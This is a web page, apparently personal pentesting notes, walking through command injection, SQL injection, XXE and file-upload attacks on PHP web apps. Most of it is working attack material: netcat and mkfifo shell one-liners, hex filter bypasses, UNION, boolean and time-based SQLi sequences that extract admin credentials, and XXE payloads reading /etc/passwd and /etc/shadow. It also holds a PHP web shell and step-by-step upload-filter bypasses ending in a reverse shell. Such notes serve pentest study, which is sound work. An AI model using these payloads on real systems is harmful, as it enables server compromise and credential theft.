                    <p>Consider the following vulnerable PHP code snippet:</p>
                    <code>&lt;?php</code><br>
                    <code>...</code><br>
                    <code>&emsp;&emsp;$title = $_GET["title"];</code><br>
                    <code>&emsp;&emsp;$command = "grep $title /var/www/html/songlist.txt";</code><br>
                    <code>&emsp;&emsp;// Also can use passthru or system functions</code><br>
                    <code>&emsp;&emsp;$search = exec($command);</code><br>
                    <code>...</code><br>
                    <code>?&gt;</code><br><br>
                    <ul>
                        <li>
                            <p>Once the RCE is discovered, all you need to do is to create a reverse shell:</p>
                            <code>;nc -e /bin/bash -l PORT</code><br><br>
                            <p>Some nc don't support -e. In that case use:</p>
                            <code>rm -f /tmp/f; mkfifo /tmp/f;</code><br>
                            <code>cat /tmp/f | /bin/sh -i 2>&1 | nc -l PORT > /tmp/f</code><br><br>
                            <p>And then connect to the tcp listener from the attacker machine:</p>
                            <code>nc VICTIM_IP VICTIM_PORT</code><br><br>
                        </li>
                        <li>On <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md">Swisskyrepo</a> you can find a list of helpful reverse shell payloads written in different scripts and languages.</li><br>
                        <li>Sometimes the PHP developer might use functions such as filter_input to sanatize the user input. Using hex value can be effective to bypass this filter. (e.g. \x6c\x73 instead of ls)</li><br>
                        <li><a href="https://github.com/payloadbox/command-injection-payload-list ">Payload Box</a> is another useful RCE payload list for Linux and Windows. Check Payload Box for SQLi, XSS, XXE, ...</li><br>
                        <li><a href="https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet">Pentest Monkey</a> is also a helpful source to find reverse shell cheat sheets.</li><br>
                    </ul>
                    <hr class="m-0" /><br>
                    <h3 class="mb-3" id="sqli">SQL Injection (SQLi)</h3>
                    <p>Happens when invalid user input data runs malicious query against the backend SQL database.</p>
                    <h4>In-Band SQLi</h4>
                    <p>Sometimes the SQL error will be presented to the client browser. It's a sign of an SQLi vulnerability. For example, imagine: </p>
                    <code>https://test.com/users?id=1 --> SELECT * FROM users WHERE id = 1</code><br><br>
                    <p>To test for error simply add " at the end:</p>
                    <code>https://text.com/users?id=1" --> SELECT * FROM users WHERE id = 1"</code> --> Will cause syntax error<br><br>
                    <p><b>Tip:</b> To take advantage of the SQLi use the UNION operator. The UNION statement must retrieve the same number of columns in each SELECT statement. The columns have to be of a similar data type, and the column order has to be the same. So we can also use this to find out the number of columns in a table.</p>
                    <p>Let's expand the previous example. Below is a  list of queries and result:</p>
                    SELECT * FROM users WHERE id = <code>1</code><br>
                    <p>id: <code>1</code>, username: <code>Arian</code>, email: <code>arian.valaei@sourcedgroup.com</code></p>
                    SELECT * FROM users WHERE id = <code>1 UNION SELECT 5, 6, database()</code><br>
                    <p>id: <code>1</code>, username: <code>Arian</code>, email: <code>arian.valaei@sourcedgroup.com</code></p>
                    <p>The second query indicates that the web app limits the results to one. So let's bypass this:</p>
                    SELECT * FROM users WHERE id = <code>0 UNION SELECT 5, "Test", database()</code><br>
                    <p>id: <code>5</code>, username: <code>Test</code>, email: <code>my_test_db</code></p>
                    <p>Now that we now that db name we can query the list of tables:</p>
                    SELECT * FROM users WHERE id = <code>0 UNION SELECT 5, "test", group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'my_test_db'</code>
                    <p>id: <code>5</code>, username: <code>Test</code>, email: <code>users, orders, staff</code></p>
                    <p>Now we can find the column names for each table:</p>
                    SELECT * FROM users WHERE id = <code>0 UNION SELECT 5, "Test", group_concat(column_name) FROM information_schema.columns WHERE table_name = 'staff'</code>
                    <p>id: <code>5</code>, username: <code>Test</code>, email: <code>id, username, password</code></p>
                    <p>We can get access to usernames and passwords now:</p>
                    SELECT * FROM users WHERE id = <code>0 UNION SELECT 5, "Test", group_concat(username,':',password SEPARATOR '&lt;br&gt;') FROM staff</code>
                    <p>id: <code>5</code>, username: <code>Test</code>, email: <code>admin1:123456, admin2:P@$$w0rd</code></p><br>
                    <h4>Blind SQLi</h4>
                    <p><b>Authentication Bypass:</b> In some cases, there is no verbose result to the attacker. Imagine this typical login scenario where the server asks the db if the username and password exist. In such case, if SQLi exists, we can perform authentication bypass:</p>
                    <code>SELECT * FROM users WHERE username='%username%' AND password='%password%' LIMIT 1;</code><br><br>
                    <p>Replace username and password with <code>' OR '1==1</code>:</p>
                    SELECT * FROM users WHERE username='<code>' OR '1==1</code>' AND password='<code>' OR '1==1</code>' LIMIT 1;<br><br>
                    <p>Or simply replace password with <code>' OR 1=1;--</code> (-- will comment out the rest of the query):</p>
                    SELECT * FROM users WHERE username='' AND password='<code>' OR 1=1;--</code>' LIMIT 1;<br><br>
                    <p><b>Boolean Based:</b> Consider the following API:</p>
                    <code>https://sourcedgroup.com/checkuser?username=admin</code> --Response--> <code>{"taken": true}</code><br><br>
                    <p>The SQL query on the backend server could probably be like:</p>
                    <p>SELECT * FROM users WHERE username = '<code>admin</code>' LIMIT 1;</p>
                    <p>Now we take advantage of the Union operator and the boolean response to find out how many columns exist in the users table:</p>
                    <p>SELECT * FROM users WHERE username = '<code>admin123' UNION SELECT 1;--</code>' LIMIT 1; --Response--> <code>{"taken": false}</code></p>
                    <p>False indicates that there should be more than one column in the users table:</p>
                    <p>SELECT * FROM users WHERE username = '<code>admin123' UNION SELECT 1,2,3;--</code>' LIMIT 1; --Response--> <code>{"taken": true}</code></p>
                    <p>Now that we know number of columns lets use wild card to find the DB name. We should test character by character or create a script to do that:</p>
                    <p>SELECT * FROM users WHERE username = '<code>admin123' UNION SELECT 1,2,3 WHERE database() LIKE '%';--</code>' LIMIT 1; --Response--> <code>{"taken": true}</code></p>
                    <p>SELECT * FROM users WHERE username = '<code>admin123' UNION SELECT 1,2,3 WHERE database() LIKE 't%';--</code>' LIMIT 1; --Response--> <code>{"taken": true}</code></p>
                    <p>SELECT * FROM users WHERE username = '<code>admin123' UNION SELECT 1,2,3 WHERE database() LIKE 'te%';--</code>' LIMIT 1; --Response--> <code>{"taken": true}</code></p>
                    <p>Once we discover the db name we can expand the same technique to retrieve table names, column names:</p>
                    <p>SELECT * FROM users WHERE username = '<code>admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'testdb' AND table_name LIKE 'a%';--</code>' LIMIT 1; --Response--> <code>{"taken": false}</code></p>
                    <p>SELECT * FROM users WHERE username = '<code>admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'testdb' AND table_name = 'users';--</code>' LIMIT 1; --Response--> <code>{"taken": true}</code></p>
                    <p>SELECT * FROM users WHERE username = '<code>admin123' UNION SELECT 1,2,3 FROM information_schema.columns WHERE table_schema = 'testdb' AND table_name = 'users' AND column_name LIKE 'use%';--</code>' LIMIT 1; --Response--> <code>{"taken": true}</code></p>
                    <p>We can also exclude columns found in each step:</p>
                    <p>SELECT * FROM users WHERE username = '<code>admin123' UNION SELECT 1,2,3 FROM information_schema.columns WHERE TABLE_SCHEMA='testdb' AND TABLE_NAME='users' AND COLUMN_NAME LIKE 'pa%' AND COLUMN_NAME != 'username';--</code>' LIMIT 1; --Response--> <code>{"taken": true}</code></p>
                    <p>Now that we know the username and password columns exist, we can extract the values:</p>
                    <p>SELECT * FROM users WHERE username = '<code>admin123' UNION SELECT 1,2,3 FROM users WHERE username LIKE 'a%</code>' LIMIT 1; --Response--> <code>{"taken": true}</code></p>
                    <p>SELECT * FROM users WHERE username = '<code>admin123' UNION SELECT 1,2,3 FROM users WHERE username = 'admin' AND password LIKE '1%</code>' LIMIT 1; --Response--> <code>{"taken": false}</code></p>
                    <p><b>Time Based:</b> If there is even no boolean-based response we can try the time based trick. If there is an immediate response, it means that the query didn't match:</p>
                    <p>SELECT * FROM users WHERE username = '<code>admin123' UNION SELECT SLEEP(5);--</code>' LIMIT 1; ---> <code>Responded immediately</code></p>
                    <p>SELECT * FROM users WHERE username = '<code>admin123' UNION SELECT SLEEP(5),2;--</code>' LIMIT 1; ---> <code>Delayed 5 seconds, 2 columns exist</code></p>
                    <p>SELECT * FROM users WHERE username = '<code>admin123' UNION SELECT SLEEP(5),2 WHERE database() LIKE 'u%';--</code>' LIMIT 1; ---> <code>Delayed 5 seconds, db name starts with u</code></p><br>
                    <hr class="m-0" /><br>
                    <h3 class="mb-3" id="xxe">XML External Entity (XXE)</h3>
                    <p>An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. Consider the following web app that takes XML as input and parses it:</p>
                    <code>POST http://example.com/xml HTTP/1.1</code><br>
                    <code>&lt;foo&gt;Hello World&lt;/foo&gt;</code><br>
                    <code>HTTP/1.0 200 OK</code><br>
                    <code>Hello World!</code><br><br>
                    <p>We might be able to take advantage of XML DTD (Document Type Defenition) external entity to disclose files from the target machine:</p>
                    <code>POST http://example.com/xml HTTP/1.1</code><br>
                    <code>&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;</code><br>
                    <code>&lt;!DOCTYPE foo [</code><br>
                    <code>&nbsp;&nbsp;&lt;!ELEMENT foo ANY&gt;</code><br>
                    <code>&nbsp;&nbsp;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;</code><br>
                    <code>]&gt;</code><br>
                    <code>&lt;foo&gt;&xxe;&lt;/foo&gt;</code><br><br>
                    <p>We can also perform SSRF and access some other hosts in the target's local network:</p>
                    <code>POST http://example.com/xml HTTP/1.1</code><br>
                    <code>&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;</code><br>
                    <code>&lt;!DOCTYPE foo [</code><br>
                    <code>&nbsp;&nbsp;&lt;!ELEMENT foo ANY&gt;</code><br>
                    <code>&nbsp;&nbsp;&lt;!ENTITY xxe SYSTEM "http://192.168.0.1/secret.txt"&gt;</code><br>
                    <code>]&gt;</code><br>
                    <code>&lt;foo&gt;&xxe;&lt;/foo&gt;</code><br><br>
                    <ul>
                        <li>If the backend server is PHP and the Expect extention module in PHP is loaded we can get RCE. Replace the external entity with <code>expect://</code> wrapper and run commands. (e.g. <code>"expect://id"</code>)</li><br>
                        <li>
                            <p>If we have access to part of the XML input and can't modify or define the <code>!DOCTYPE</code> element, we might be able to use <code>XInclude</code> by defining namespace and include path:</p>
                            <code>&lt;foo xmlns:xi="http://www.w3.org/2001/XInclude"&gt;</code><br>
                            <code>&lt;xi:include parse="text" href="file:///etc/shadow"/&gt;&lt;/foo&gt;</code>
                        </li>
                    </ul><br>
                    <hr class="m-0" /><br>
                    <h3 class="mb-3" id="upload-vulnerabilities">Upload Vulnerabilities</h3>
                    <p>Upload vulnerabilities can provide the attacker with the opportunity to perform RCE. For example, as the attacker, you might upload the following PHP file instead of a valid account profile image:</p>
                    <code>&lt;?php</code><br>
                    <code>&nbsp;&nbsp;echo system($_GET["cmd"]);</code><br>
                    <code>?&nbsp;</code><br><br>
                    <p>Then you might need to use an enumeration tool like Gobuster to find some assets (images, uploads, ...) directory on your victim domain:</p>
                    <code>http://test.com/uploads/webshell.php?cmd=whoami</code><br><br>
                    <p>Now you can use a PHP reverse shell payload to replace as the cmd query parameter value. Below is a step by step guide to exploit the upload vulnerability:</p>
                    <ul>
                        <li>Check Wappalyzer to detect the backend server language. (Could be detected from HTTP response headers as well <code>"X-Powered-By"</code>)</li><br>
                        <li>Find a reverse shell payload according to the backend server language detected by the Wappalyzer. Use Pentest Monkey or Swisskyrepo as the source.</li><br>
                        <li>Bypass the client side filtering if exists. Capture the server response in BurpSuit proxy, detect the js responsible for filtering and edit or remove it.</li><br>
                        <li>If the server side filtering is based on extension, try different extensions that might be executable. For example, instead of .php, try .php5, .pht, .phar, .php-s...</li><br>
                        <li>If the backend app is poorly developed, you might be able bypass server-side filtering by appending a valid extention like shell.jpg.php</li><br>
                        <li>Sometimes you can bypass the serverside filtering by editing or adding a valid file signature to the beginning of your payload file using hexedit. You can find a list of magic numbers <a href="https://en.wikipedia.org/wiki/List_of_file_signatures">here</a>. (Specially PHP servers are very vulnerable to this)</li><br>
                        <li>Find the content (assets, images, ...) directory and find your uploaded file using Gobuster in dir mode and -x option for filtering file types. (In case you file name is assigned a new name by the backend server)</li><br>
                        <li>Start the Netcat listner on you machine and execute the uploaded reverse shell file from your browser.</li><br>
                    </ul>
                    <hr class="m-0" /><br>
                </div>
            </section>
            <hr class="m-0" />

        <!-- Bootstrap core JS-->
        <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js"></script>
        
        <!-- Core theme JS-->
        <script src="js/scripts.js"></script> 
    </body>
</html>
